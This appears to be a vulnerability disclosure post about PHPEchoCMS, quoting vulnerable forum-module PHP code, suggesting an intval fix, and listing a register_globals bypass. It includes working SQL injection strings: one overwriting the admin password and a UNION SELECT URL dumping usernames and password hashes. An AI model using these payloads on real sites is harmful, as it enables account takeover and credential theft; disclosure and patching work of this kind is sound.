PHPEchoCMS Multible remote vulnerabilitis
Hello,,
PHPEchoCMS Multible remote vulnerabilitis
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@xxxxxxxxx
fiest thing ..
full path
kernel/init.php
modules/admin/index.php
..
every file to be included has to have the value of the variable $BASE_LOAD
but if the register globals is on then you can use in the browser like this ..
modules/files/index.php?BASE_LOAD=1
it will continue .. and other files too
modules/forum/index.php
lines [31-49]
if (@$_POST['post']=='thread')
{
if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
{
// Add the thread to the specified section
$ins = "INSERT INTO `".PREFIX."threads` VALUES ('',
'".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']).
"', '".str_replace("\n", "<br>",
addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y
H:i")."', '0')";
$res = query($ins, 1);
$ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y
H:i")." WHERE `id`=".addslashes($_POST['id']);
$res = query($ins, 1);
$nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
redirect ("index.php?module=forum&show=thread&id=".$nb);
}
else
{
$content = $mlang['017'];
}
}
see
$ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y
H:i")." WHERE `id`=".addslashes($_POST['id']);
could be modified to an update query by posting value of id as next
id=union update members set password=[value] where id=1
offcourse value here should be md5 hash .. and no brackets so the query will be
ok :)
lines[138-142]
elseif (@$_GET['show']=='thread' && $_GET['id'])
{
// Show a thread and its replies (child-threads)
$thread = query("SELECT * FROM `".PREFIX."threads` WHERE
id=".addslashes($_GET['id']), 4);
replace with
elseif (@$_GET['show']=='thread' && $_GET['id'])
{
// Show a thread and its replies (child-threads)
$thread = query("SELECT * FROM `".PREFIX."threads` WHERE
id='".intval($_GET['id'])."'", 4);
exploit
index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*
# WwW.SoQoR.NeT